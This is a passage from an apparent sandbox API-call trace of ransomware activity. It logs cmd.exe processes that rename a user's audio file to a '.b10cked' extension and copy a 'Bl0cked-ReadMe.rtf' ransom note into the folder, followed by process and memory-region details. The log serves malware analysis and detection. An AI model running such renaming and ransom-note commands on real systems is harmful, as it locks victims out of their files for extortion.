RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x0, lpData=0x30ee60*=0x9, lpcbData=0x30ee58*=0x1000) returned 0x2 [0227.360] RegCloseKey (hKey=0x40) returned 0x0 [0227.360] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bb [0227.360] srand (_Seed=0x5b8863bb) [0227.360] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked\"" [0227.360] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked\"" [0227.361] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4f5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.361] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xa1910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0227.361] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0227.361] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0227.361] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0227.361] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0227.361] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0227.361] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0227.361] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0227.361] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0227.361] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0227.361] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0227.361] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0227.361] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0227.362] GetEnvironmentStringsW () returned 0xa2300* [0227.362] FreeEnvironmentStringsW (penv=0xa2300) returned 1 [0227.362] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.362] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0227.362] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0227.362] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0227.362] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0227.362] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0227.362] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0227.362] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0227.362] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0227.362] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0227.362] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30fc20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.362] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30fc20, lpFilePart=0x30fc1c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30fc1c*="Desktop") returned 0x18 [0227.362] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0227.362] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f99c | out: lpFindFileData=0x30f99c) returned 0xa0040 [0227.363] FindClose (in: hFindFile=0xa0040 | out: hFindFile=0xa0040) returned 1 [0227.363] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f99c | out: lpFindFileData=0x30f99c) returned 0xa0040 [0227.363] FindClose (in: hFindFile=0xa0040 | out: hFindFile=0xa0040) returned 1 [0227.363] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f99c | out: lpFindFileData=0x30f99c) returned 0xa0040 [0227.363] FindClose (in: hFindFile=0xa0040 | out: hFindFile=0xa0040) returned 1 [0227.363] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0227.364] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0227.364] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0227.364] GetEnvironmentStringsW () returned 0xa2b20* [0227.364] FreeEnvironmentStringsW (penv=0xa2b20) returned 1 [0227.364] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4f5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.364] GetConsoleOutputCP () returned 0x1b5 [0227.365] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0227.365] GetUserDefaultLCID () returned 0x409 [0227.365] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a4f4950, cchData=8 | out: lpLCData=":") returned 2 [0227.365] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fd60, cchData=128 | out: lpLCData="0") returned 2 [0227.365] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fd60, cchData=128 | out: lpLCData="0") returned 2 [0227.365] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fd60, cchData=128 | out: lpLCData="1") returned 2 [0227.365] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a4f4940, cchData=8 | out: lpLCData="/") returned 2 [0227.365] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a4f4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0227.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a4f4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0227.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a4f4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0227.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a4f4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0227.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a4f4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0227.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a4f4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0227.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a4f4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0227.366] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a4f4930, cchData=8 | out: lpLCData=".") returned 2 [0227.366] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a4f4920, cchData=8 | out: lpLCData=",") returned 2 [0227.366] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0227.367] GetConsoleTitleW (in: lpConsoleTitle=0x90900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.367] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0227.367] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0227.367] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0227.367] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0227.368] _wcsicmp (_String1="move", _String2=")") returned 68 [0227.368] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0227.368] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0227.368] _wcsicmp (_String1="IF", _String2="move") returned -4 [0227.368] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0227.368] _wcsicmp (_String1="REM", _String2="move") returned 5 [0227.368] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0227.372] GetConsoleTitleW (in: lpConsoleTitle=0x30fa58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.468] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0227.468] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0227.468] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0227.468] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0227.468] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0227.468] _wcsicmp (_String1="move", _String2="CD") returned 10 [0227.468] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0227.468] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0227.468] _wcsicmp (_String1="move", _String2="REN") returned -5 [0227.468] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0227.468] _wcsicmp (_String1="move", _String2="SET") returned -6 [0227.468] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0227.468] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0227.468] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0227.468] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0227.468] _wcsicmp (_String1="move", _String2="MD") returned 11 [0227.468] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0227.468] _wcsicmp (_String1="move", _String2="RD") returned -5 [0227.468] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0227.468] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0227.469] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0227.469] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0227.469] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0227.469] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0227.469] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0227.469] _wcsicmp (_String1="move", _String2="VER") returned -9 [0227.469] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0227.469] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0227.469] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0227.469] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0227.469] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0227.469] _wcsicmp (_String1="move", _String2="START") returned -6 [0227.469] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0227.469] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0227.469] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0227.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0227.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0227.471] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f814, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f80c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0227.471] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0227.473] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0227.473] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0227.473] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0227.473] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0227.473] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0227.473] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0227.473] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0227.473] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0227.474] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0227.474] _wcsicmp (_String1="CII3ZM~1.WAV", _String2=".") returned 53 [0227.474] _wcsicmp (_String1="CII3ZM~1.WAV", _String2="..") returned 53 [0227.474] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\cii3zm~1.wav")) returned 0x20 [0227.475] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa1e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.475] SetErrorMode (uMode=0x0) returned 0x0 [0227.475] SetErrorMode (uMode=0x1) returned 0x0 [0227.475] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV", nBufferLength=0x104, lpBuffer=0x30f19c, lpFilePart=0x30f184 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV", lpFilePart=0x30f184*="CII3ZM~1.WAV") returned 0x33 [0227.475] SetErrorMode (uMode=0x0) returned 0x1 [0227.475] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00")) returned 0x10 [0227.475] _wcsicmp (_String1="CII3ZM~1.WAV", _String2=".") returned 53 [0227.475] _wcsicmp (_String1="CII3ZM~1.WAV", _String2="..") returned 53 [0227.475] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\cii3zm~1.wav")) returned 0x20 [0227.475] SetErrorMode (uMode=0x0) returned 0x0 [0227.476] SetErrorMode (uMode=0x1) returned 0x0 [0227.476] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV", nBufferLength=0x104, lpBuffer=0x30f618, lpFilePart=0x30f3b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV", lpFilePart=0x30f3b0*="CII3ZM~1.WAV") returned 0x33 [0227.476] SetErrorMode (uMode=0x0) returned 0x1 [0227.476] SetErrorMode (uMode=0x0) returned 0x0 [0227.476] SetErrorMode (uMode=0x1) returned 0x0 [0227.476] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked", nBufferLength=0x104, lpBuffer=0x30f820, lpFilePart=0x30f3b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked", lpFilePart=0x30f3b0*="cii3Zm5ag7.wav.b10cked") returned 0x3d [0227.476] SetErrorMode (uMode=0x0) returned 0x1 [0227.477] SetLastError (dwErrCode=0x0) [0227.477] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\cii3zm5ag7.wav.b10cked")) returned 0xffffffff [0227.478] GetLastError () returned 0x2 [0227.478] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV", fInfoLevelId=0x1, lpFindFileData=0x30ed2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ed2c) returned 0x90ef0 [0227.479] FindNextFileW (in: hFindFile=0x90ef0, lpFindFileData=0x30ed2c | out: lpFindFileData=0x30ed2c) returned 0 [0227.481] GetLastError () returned 0x12 [0227.481] FindClose (in: hFindFile=0x90ef0 | out: hFindFile=0x90ef0) returned 1 [0227.482] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV", fInfoLevelId=0x1, lpFindFileData=0xa1c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa1c30) returned 0x90ef0 [0227.483] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked", nBufferLength=0x104, lpBuffer=0x30efc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked", lpFilePart=0x0) returned 0x3d [0227.483] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav", nBufferLength=0x104, lpBuffer=0x30efc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav", lpFilePart=0x0) returned 0x35 [0227.483] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\cii3zm5ag7.wav")) returned 0x20 [0227.483] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\cii3zm5ag7.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\cii3zm5ag7.wav.b10cked"), dwFlags=0x3) returned 1 [0227.484] FindClose (in: hFindFile=0x90ef0 | out: hFindFile=0x90ef0) returned 1 [0227.484] _vsnwprintf (in: _Buffer=0x4a4f5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30ef78 | out: _Buffer=" 1") returned 9 [0227.484] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.484] GetFileType (hFile=0x7) returned 0x2 [0227.484] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0227.484] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30ef04 | out: lpMode=0x30ef04) returned 1 [0227.484] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.484] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30ef38 | out: lpConsoleScreenBufferInfo=0x30ef38) returned 1 [0227.484] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a504640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0227.485] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a504640, nSize=0x2000, Arguments=0x30ef78 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0227.485] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a504640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30ef5c, lpReserved=0x0 | out: lpBuffer=0x4a504640*, lpNumberOfCharsWritten=0x30ef5c*=0x1a) returned 1 [0227.485] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.485] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0227.485] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.485] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4f41ac | out: lpMode=0x4a4f41ac) returned 1 [0227.486] _get_osfhandle (_FileHandle=0) returned 0x3 [0227.486] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4f41b0 | out: lpMode=0x4a4f41b0) returned 1 [0227.486] SetConsoleInputExeNameW () returned 0x1 [0227.486] GetConsoleOutputCP () returned 0x1b5 [0227.486] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0227.486] SetThreadUILanguage (LangId=0x0) returned 0x409 [0227.486] exit (_Code=0) Process: id = "602" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e80" os_pid = "0xfb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34126 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34127 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34128 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34129 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 34130 start_va = 0x4a4d0000 end_va = 0x4a51bfff entry_point = 0x4a4d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34131 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34132 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34133 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34134 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 34135 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34166 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34167 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34168 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34169 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 34170 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 34171 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34172 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34173 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34174 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34175 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34176 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34177 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34178 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: 